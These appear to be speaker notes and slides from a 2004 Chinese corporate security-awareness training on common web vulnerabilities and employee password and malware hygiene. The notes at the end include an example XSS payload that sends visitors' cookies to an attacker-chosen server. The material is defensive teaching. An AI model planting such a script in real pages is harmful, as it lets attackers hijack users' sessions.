应用安全培训相关资料.pptVIP

安全：网站的命脉 网络系统部：陈洋 MSN：connor@ 2004年12月27日 安全：网站的命脉 公司安全现状 常见漏洞介绍及处理方法 用户安全意识 公司安全现状 通过前段时间的应用检查，共发现15个部门的100个漏洞 其中严重的安全漏洞46个 常见漏洞介绍 跨站脚本（XSS） SQL注入 验证逻辑绕过 Cookies使用不当 加密算法滥用 泄漏源代码 弱口令 明文传输 跨站脚本（XSS） 什么叫跨站脚本漏洞 是如何造成的 有什么危害 还可以怎么来利用 如何防范 例如 SQL注入 什么叫SQL注入 SQL注入漏洞演示 SQL注入漏洞是怎样产生的 如何防范SQL注入 验证逻辑绕过 多权限管理系统 验证流程 加密的信息认为只要能解密则认为认证通过 Cookies使用不当 明文Cookies Cookies信息可以推算 Cookies是可以被修改的 隐藏提交 解决方法：对cookies进行加密、签名 加密算法滥用 加密算法强度 加密串被替换 利用系统自身完成加解密 加密算法使用原则 泄漏原代码 修改脚本程序时，在程序后加上 .bak，.old等后缀做为备份，泄漏原代码 使用UltraEdit 软件直接在服务器上修改程序，UltraEdit软件默认是用.BAK后缀备份修改过的文件，默认备份目录是当前目录 弱口令 密码和用户名同样的弱口令大量存在 渗透：同一用户在多个系统使用同样的口令 缺少恰当的用户密码复杂度策略 明文传输 密码等敏感信息是明文传输的，可以在网络中被截获 解决方法：使用SSL，也就是https进行登陆信息传输，或者使用javascript对密码进行hash运算后传输 用户安全意识 个人密码 不明程序防范 如何识别攻击、病毒和木马程序 及时安装系统更新和补丁 工作电脑使用安全 备份工作数据 不要暴露个人信息 个人密码 禁止在任何地方明文存放任何涉及公司系统的密码 密码存放必须加密，推荐使用PGP加密，有时候没有PGP的时候，也可以使用Winzip、Winrar的加密功能进行加密，加密的密码必须8位或者8位以上 推荐使用带加密功能的密码管理软件对个人密码进行管理，设置密码的时候由软件随机生成十二位或以上长度的随机字符串 各个不同的系统使用不同的密码，避免不同系统使用同一密码 禁止使用和公司内部系统一样的密码在外部其他网站、论坛使用。如果用户在本公司外使用公司内的密码，会很容易受到攻击，用户密码往往会个电子邮件地址存储在一起。只要利用这种存储组合，攻击这就可以确定用户所在的工作单位、用户名及用户密码 遵守公司关于密码使用控制方面的管理规定 不明程序防范 不要随意运行不明程序，特别是个人网站上下载的.exe程序以及不明底细的电子邮件的附件 不要安装未经授权或未经许可的软件，否则有可能会执行包含特洛伊木马病毒或者其他有害工具应用程序，从而给本人和公司带来了风险 使用浏览器浏览网站的时候，不要随意安装网站上的ActiveX插件，特别注意不要安装个人网站的插件 不要为了加快电脑运行速度而禁用杀毒软件 如何识别攻击、病毒和木马程序 如果自己的密码被修改，要追查修改原因，很多时候密码被修改了是已经被入侵了 运行某程序后没有任何反应，需要马上检查进程和启动组，运行msconfig查看启动选项卡里面是否有陌生启动项 及时安装系统更新和补丁 确认自己机器的自动更新是打开的 经常到Windows Update网站上扫描有没有自己系统没有安装的更新 关注自己安装的软件的修补程序、更新程序和纠错程序的最新动态 工作电脑使用安全 在离开自己的工作电脑的时候，必须锁定自己的电脑，锁定的快捷键：win+L 笔记本电脑要在BIOS里面设定笔记本硬盘密码、对机密工作数据使用PGP或者NTFS的加密进行保护，防止万一笔记本电脑被盗造成机密资料外泄 备份工作数据 经常对自己的工作数据进行加密备份，否则一旦受到攻击或者遇到意外，恢复数据的可能性很小 尽量不要暴露个人信息 告诉别人您孩子的姓名、详细的出生日期等都会给攻击者提供更多的机会猜测出密码或者通过社会工程学手段进行未经授权的访问。在电话中与攻击者口头交流、通过电子邮件等可能会直接泄漏信息 感谢您的参与！ * * 用户输入的符号可以在IE中当作html代码执行 攻击者可以来构造一个html语句，利用javascript把浏览着的cookies等信息发送到攻击者指定的服务器例如：scriptwindow.open(/ info.php?%2Bdocument.cookie)/script 攻击者可以利用iframe来让浏览者后台访问攻击者定制的网页木马 程序员在编写代码的时候，没有对用户输入数据的合法性进行判断，使应用程序存在安全隐患。